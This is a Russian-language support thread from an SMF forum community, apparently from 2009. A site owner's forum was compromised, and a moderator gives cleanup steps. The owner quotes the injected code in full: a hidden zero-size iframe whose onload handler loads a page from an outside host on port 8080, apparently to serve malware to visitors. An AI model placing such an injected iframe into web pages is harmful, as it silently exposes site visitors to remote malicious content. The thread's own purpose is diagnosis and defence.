Срочно нужна помощь!!!

Автор Snifer, 24 октября 2009, 19:40:39

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Snifer

третий раз за сегодня восстанавливаюсь из бекапов. форум работает около часа, затем ошибка. к логам апача нет, в логах форума ни одной ошибки.
Модов нет.
Два форума находятся на разных доменах на одном хостинге.

вот: rehber.ru

Mavn

Гадалки в отпусках, а кофеяйная гуща не показывает, что у вас за ошибка возникает.
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Snifer

ну как бы я ссылку на сайт дал... Ну в мусорку так в мусорку. спасибо за поддержку...

Mavn

1. Тему в мусорку отправил ибо название темы не имеет смысла.
2. Если есть ошибки выкладывайте их здесь, ходить по сайтам и смотреть на ошибки не видим смысла.
3. Чем более детальную информацию по ошибке вы предоставите тем быстрее и возможно лучше ответ получите!
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Snifer

#4
Ок. впредь буду внимательнее. а ошибки на форуме из-зи вируса, фрейм какой-то прописался во все index.php (у хостера так сказали.) сейчас ищу что за фрейм и где... Спасибо.

вот такой фрейм поймал:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://gooiq.ru:8080/index.php'; this.height='0'; this.width='0';}" >szwjcqnzqrsenucijktudfkshhyffkn</iframe>';

Как он смог прописаться? И какие методы защиты?

Mavn

1. Проверь комп на вирусы скорее всего зараза на компе висит.(проверить можно при помощи утилиток avz, avp removal tools, hijackthis, cureit через яндекс или гугл найдете легко)
2. после проверки компа (на сайт не заходить и вообще его лучше выключить чтобы люди не цепляли заразу) поменять пароли на серваке(фтп, мускл и пр.), на локальном компе, на почту в общем везде где можно.
3. Убрать все файлы с сайта, сделав предварительно бэкап.
4. Залить свежие чистые файлы с офф сайта.
5. Проверить количество и качество тем оформления, возможно установлены левые темы оформления.

ПС вот по причине того что сайт может быть заражен мы и не ходим по ссылкам!
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Snifer

1. У меня линукс...
2. Сайт сразу выключил, пароли сразу поменял.
3. Сделал.
4. Сделал.
5. Тема оформления с официального сайта SMF.

Mavn спасибо за советы.
Таолько после залития чистых файлов, не мог залогиниться на форум...
Описано ЗДЕСЬ